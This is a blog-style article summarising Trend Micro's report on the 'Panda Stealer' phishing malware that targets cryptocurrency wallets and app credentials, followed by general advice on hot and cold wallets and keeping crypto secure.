Panda attacks on crypto wallets

I’m not talking about attacks by a cuddly black and white bear from China, but instead a series of new ransomware attacks. The ‘Panda’ malware has been targeting cryptocurrency wallets, “along with account credentials from other applications such as NordVPN, Telegram, Discord and Steam,” according to a Coindesk report.

Trend Micro, a cybersecurity company, discovered the malware that steals information and dubbed it ‘Panda Stealer’. The malware has been found targeting individuals across countries including the US, Australia, Japan, and Germany.

The malware begins its infection chain through phishing emails that pretend to be business quote requests.

According to ZDNet, two methods have been linked to the campaign: the first uses attached .XLSM documents that require victims to enable malicious macros.If macros are permitted, a loader then downloads and executes the main stealer. 

In the second method, “an attached .XLS file contains an Excel formula that hides a PowerShell command. This command attempts to access a paste.ee URL to pull a PowerShell script to the victim’s system and to then grab a fileless payload.”

Once downloaded, Panda Stealer will attempt to detect keys and addresses associated with cryptocurrency wallets holding funds including Ethereum (ETH), Litecoin (LTC), Bytecoin (BCN), and Dash (DASH).

Trend Micro researchers who discovered the attack said, “Crypto wallets are now as big of a target for online theft as banking accounts are. With more people getting into cryptocurrencies and the values of said cryptocurrencies still increasing, this will only become a greater threat moving forward.”

They also pointed out that there is more risk here as unlike theft via a bank or a credit card, there may not be a central authority that can undo malicious transactions. Once you lose your money and the transaction goes on the blockchain, it’s likely gone forever.

“None of this is particularly novel in and of itself – malicious Office documents are well known, so is fileless loading,” Trend Micro researchers said. “The main “new” aspect here is the target of the data theft.” For example, attackers are setting their sights on applications like Discord and Telegram – popular communications platforms for cryptocurrency communities. 

Even if this type of attack is new, Trend Micro recommends following standard security practices, such as not opening up attachments sent via email, making sure you don’t click on unknown links, and keeping software up still are basic security measures people can take to avoid malware and other security breaches. They added that the best advice is to secure your cryptocurrency wallets and recommended using strong, unique passwords, and commented, “For investors who are more interested in holding cryptocurrencies for the long term instead of actively trading them, the use of hardware-based/offline wallets may well be safer, if less convenient to add to or sell from.”

Top tips for keeping your cryptocurrency wallet secure

If you’re a newcomer to the crypto space it’s likely you’re excited about it, but at the same time worried about security because you have heard the stories about people losing fortunes just because they lost the password to their crypto wallet. On top of that, you may have searched for reliable information about keeping your wallet secure, but haven’t found it yet. It’s important that you carefully consider the pros and cons of how you ultimately decide to purchase, store and transact with your crypto. After all, if you lose your crypto it is gone forever!

How people lose their crypto

Here are some of the ways in which people have lost their cryptocurrency holdings:

Loss

• Human error

(e.g., you send your funds to the wrong wallet, you forget your password)

• Natural disaster

(e.g., your house burns down with your crypto wallet(s) stored inside it)

• Hardware malfunction/loss

(e.g., your computer hard drive holding your private keys is corrupted)

Theft

• Remote theft

(e.g., you fall victim to scams, an exchange hack, or a personal hack)

• Physical robbery

(e.g., your backpack or purse is stolen with your private keys in it)

• Government seizure

(e.g., law enforcement demands an exchange to freeze your account)

I hope none of these happen to you.

Types of wallets

A wallet is a computer programme that stores crypto. Depending on whether the wallet is connected to the internet, crypto wallets are classified as: “hot” (online) or “cold” (offline).

Hot wallets

Hot storage wallets exist on an internet-connected desktop, laptop, mobile phone or

web browser. These wallets are popular because they can be easily created and used

immediately. This means some safety is sacrificed and they are vulnerable to cyber attacks.

Cold wallets

Cold storage wallets exist on devices or physical media that are not connected to the

Internet. Often they are like a USB flash drive. They are safer than hot wallets because private keys are generated and stored offline where they can’t be accessed by cybercriminals, but they can be stolen from you through a physical robbery. The downside is that funds in a cold wallet aren’t as available for spending as those in a hot wallet. The most reliable exchanges, such as Kraken, Coinbase and Binance use both hot and cold wallets so that some funds are always available for immediate use (in hot wallets) to facilitate day-to-day transactions, while the majority are stored offline for safekeeping (cold wallets). When storing your crypto, you should take your own personal financial situation and risk tolerance into account when you  are considering which one of the following storage strategies to use.

The small investor

If you have less than $10,000 in crypto, the best advice is to keep things simple and use a reputable exchange to store your crypto. Kraken, Coinbase and Binance are the big names, but your choice may depend on where you live.

The medium investor

With $10,000 – $200,000 in crypto, you should use a hardware wallet and place a backup copy in a safety deposit box.

The large investor

If you have over $200,000 in crypto, it is recommended you need a trusted custodian, multi signature wallet technology and/or full nodes. Consulting with a professional about this is recommended.

How Do Wallets Work?

Crypto wallets function is a similar way to traditional bank accounts, in that both an “account

number” and “password” are required to access the funds held in the wallet. When you

creates a wallet, you generate a unique cryptographic key pair – one public and one private –

which allows you to send or receive crypto. The public key is like your bank account number, and the private key acts in a similar way to your banking password. Here is an example of how a wallet operates for a transaction:

Example of a Bitcoin Transaction

1. Alice owes Bob 0.02 bitcoin

2. Bob sends Alice his public wallet address to receive payment

3. Alice uses her own private key to send 0.02 bitcoin associated with one of her wallets

to Bob’s public wallet address

4. The 0.02 bitcoin sent by Alice is received in Bob’s wallet.

And that’s how easy it is.

A last word of advice

Don’t store your assets in desktop wallets, ‘brain’ wallets (i.e., memorized private key), or web wallets (i.e., private key held on a website) as these wallets offer low security. If you are going to buy a hardware or software wallet, buy it from a reputable authorized retailer and not from second-hand stores, such as eBay.

Finally, every crypto owner must have a plan for their crypto when

they pass away. If no plan is put in place, your crypto assets will die along with you.

It’s essential that every crypto owner includes their crypto asset holdings in

their will and teaches one or more trusted individuals (i.e. family members) how to access

their crypto funds in the case of severe injury or death.